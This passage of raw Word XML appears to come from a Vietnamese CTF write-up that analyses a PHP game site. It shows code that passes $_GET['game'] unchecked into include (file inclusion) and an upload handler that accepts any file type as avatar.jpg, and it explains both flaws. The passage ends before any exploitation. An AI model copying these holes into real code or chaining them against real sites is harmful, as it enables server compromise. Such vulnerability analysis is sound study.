          <w:p w14:paraId="4ABCE9B4" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">        header(</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'Location: /game.php?game=fatty-bird-1.html'</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C5E6AAB" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2EF883" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E00A3FC" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:t xml:space="preserve">    $game = $_GET[</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'game'</w:t>
            </w:r>
            <w:r w:rsidRPr="00121B5F">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="299FF80E" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRPr="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00121B5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F454A16" w14:textId="77777777" w:rsidR="00121B5F" w:rsidRDefault="00121B5F" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>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9F0861" w:rsidRPr="009F0861" w14:paraId="399493E2" w14:textId="77777777" w:rsidTr="009F0861">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60099203" w14:textId="77777777" w:rsidR="009F0861" w:rsidRPr="009F0861" w:rsidRDefault="009F0861" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009F0861">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A336683" w14:textId="77777777" w:rsidR="009F0861" w:rsidRPr="009F0861" w:rsidRDefault="009F0861" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009F0861">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50F09F3B" w14:textId="77777777" w:rsidR="009F0861" w:rsidRPr="009F0861" w:rsidRDefault="009F0861" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009F0861">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A198D00" w14:textId="77777777" w:rsidR="009F0861" w:rsidRPr="009F0861" w:rsidRDefault="009F0861" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009F0861">
              <w:t>&lt;div style="background-color: white; padding: 20px;"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0143086E" w14:textId="77777777" w:rsidR="009F0861" w:rsidRPr="009F0861" w:rsidRDefault="009F0861" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009F0861">
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r w:rsidRPr="009F0861">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
            <w:r w:rsidRPr="009F0861">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009F0861">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
            <w:r w:rsidRPr="009F0861">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009F0861">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'./views/'</w:t>
            </w:r>
            <w:r w:rsidRPr="009F0861">
              <w:t xml:space="preserve"> . $game; </w:t>
            </w:r>
            <w:r w:rsidRPr="009F0861">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03A705C2" w14:textId="77777777" w:rsidR="009F0861" w:rsidRPr="009F0861" w:rsidRDefault="009F0861" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="009F0861">
              <w:t>&lt;/div&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76EA7E4E" w14:textId="77777777" w:rsidR="009F0861" w:rsidRDefault="009F0861" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0548B0A4" w14:textId="77777777" w:rsidR="00520431" w:rsidRDefault="00520431" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="009EA858" w14:textId="01A07F85" w:rsidR="00520431" w:rsidRPr="00520431" w:rsidRDefault="00520431" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00520431">
        <w:lastRenderedPageBreak/>
        <w:t>Chức năng chính</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ACF5EF" w14:textId="77777777" w:rsidR="00520431" w:rsidRPr="00520431" w:rsidRDefault="00520431" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00520431">
        <w:t>Ứng dụng kiểm tra đăng nhập qua $_SESSION['name'].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4363B3FB" w14:textId="77777777" w:rsidR="00520431" w:rsidRPr="00520431" w:rsidRDefault="00520431" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00520431">
        <w:t>Cho phép cập nhật điểm số qua $_POST["points"].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FC8789" w14:textId="77777777" w:rsidR="00520431" w:rsidRPr="00520431" w:rsidRDefault="00520431" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00520431">
        <w:t>Nếu không có tham số game, sẽ chuyển hướng đến trò chơi mặc định.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8EBEAC" w14:textId="38A8B6F8" w:rsidR="00520431" w:rsidRDefault="00520431" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00520431">
        <w:t>Nếu có $_GET['game'], biến $game được gán trực tiếp và sử dụng trong câu lệnh:</w:t>
      </w:r>
      <w:r w:rsidR="002D587E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D587E" w:rsidRPr="002D587E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;?php include './views/' . $game; ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F3C934" w14:textId="77777777" w:rsidR="002D587E" w:rsidRPr="002D587E" w:rsidRDefault="002D587E" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002D587E">
        <w:t>→ Đây là điểm trọng yếu: nội dung của $game được nối trực tiếp vào đường dẫn file và sử dụng trong include.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F6781B" w14:textId="304543CB" w:rsidR="002D587E" w:rsidRDefault="002D587E" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tiếp đó là đoạn code upload file:</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4535F1" w:rsidRPr="004535F1" w14:paraId="1E3F9B17" w14:textId="77777777" w:rsidTr="00D5569D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20BDCE5D" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CA28075" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7126C498" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7750EEFB" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76ED0572" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF6E6C3" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03FFCCE4" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0763F8A9" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="214716DB" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F449086" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44692AAA" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11968843" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56F63746" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EB35677" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D06ED5" w14:textId="77777777" w:rsidR="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0108EB80" w14:textId="3691CF74" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E3F3FED" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B844A4D" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D236428" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C639DB" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// error_reporting(0);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CA672E9" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'./db.php'</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6892FAC8" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="69ABB5F4" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// if is not login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B702FAC" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve"> (!isset($_SESSION[</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'name'</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t>])) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19E1D81E" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">    header(</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'Location: /register.php'</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="082CA97B" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>die</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t>();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="346E781A" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D023B90" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29B3CD0B" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">  $response = </w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71CDEEA4" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve"> (isset($_FILES[</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"fileUpload"</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t>])) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04490D02" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// Always store as avatar.jpg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16CC4C24" w14:textId="77777777" w:rsidR="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">    move_uploaded_file($_FILES[</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"fileUpload"</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t>][</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"tmp_name"</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">], </w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"/var/www/html/upload/"</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve"> . </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0184A9EC" w14:textId="155C739F" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t>$_SESSION[</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"name"</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">] . </w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"/avatar.jpg"</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59776BF2" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">    $response = </w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"Success"</w:t>
            </w:r>
            <w:r w:rsidRPr="004535F1">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5574F902" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03819BB8" w14:textId="77777777" w:rsidR="004535F1" w:rsidRPr="004535F1" w:rsidRDefault="004535F1" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="004535F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22E54A07" w14:textId="24D31D71" w:rsidR="00F13951" w:rsidRPr="00F13951" w:rsidRDefault="00F13951" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F13951">
        <w:t>Nếu có dữ liệu từ $_FILES["fileUpload"], hệ thống sẽ lưu file vào đường dẫn cố định:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5155B37A" w14:textId="77777777" w:rsidR="00F13951" w:rsidRPr="00F13951" w:rsidRDefault="00F13951" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13951">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/upload//avatar.jpg </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD32D5B" w14:textId="77777777" w:rsidR="00F13951" w:rsidRPr="00F13951" w:rsidRDefault="00F13951" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F13951">
        <w:t>→ Tên file luôn bị ghi đè thành avatar.jpg, bất kể tên gốc của file là gì</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38541353" w14:textId="03D9F1AC" w:rsidR="00F13951" w:rsidRPr="00F13951" w:rsidRDefault="00F13951" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tuy nhiên </w:t>
      </w:r>
      <w:r w:rsidRPr="00F13951">
        <w:t>có thể upload bất kỳ loại file nào, kể cả .php, .html, .exe, v.v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vì hệ thống không kiểm tra phần mở rộng hoặc MIME và cũng không xác thực nội dung file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AA93B9" w14:textId="77777777" w:rsidR="0017615F" w:rsidRDefault="0017615F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B25003" w14:textId="52C2A7C2" w:rsidR="00F13951" w:rsidRDefault="00F13951" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
